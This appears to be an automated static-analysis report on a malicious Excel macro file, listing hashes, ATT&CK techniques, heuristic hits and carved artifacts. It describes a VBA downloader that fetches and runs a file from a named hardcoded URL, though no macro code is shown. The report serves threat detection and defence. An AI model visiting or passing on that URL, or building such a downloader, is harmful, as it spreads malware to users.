Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 9adef6fda6e4cacf…

MALICIOUS

Office (OOXML) / .XLSM

30.2 KB Created: 2022-06-06 14:15:08 UTC Authoring application: 16.0300 First seen: 2022-06-07
MD5: 09ab597a496b6f5ea7cea34d3e4233b3 SHA-1: c1f635128b111ee997aafc744e54b253878b6400 SHA-256: 9adef6fda6e4cacff8bf23da5e87d61912771c26d93cecab04dc1c7d99bb9d5f
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059.003 Windows Command Shell

The sample is an XLSM file containing VBA macros. The critical heuristic 'OLE_VBA_DOWNLOAD' indicates the use of URLDownloadToFileA, and 'OLE_VBA_SHELL' indicates the use of Shell(). The VBA script attempts to download a file from a hardcoded URL and execute it. The reconstructed URL from the script is 'http://podi.co/uno'. This functionality strongly suggests a downloader or droppper malware.

Heuristics 4

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
613a335812e9eb87a2ad3de067451f834d371d10ed83dc694f4ad5dcd9c38ab5		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2093 bytes
vbaProject_00.bin
ff13a03f0b9b7e96452ab40f7821ee40a7d342c1c382a164b28d768d4b2f2f11		 vba-project OOXML VBA project: xl/vbaProject.bin 17408 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.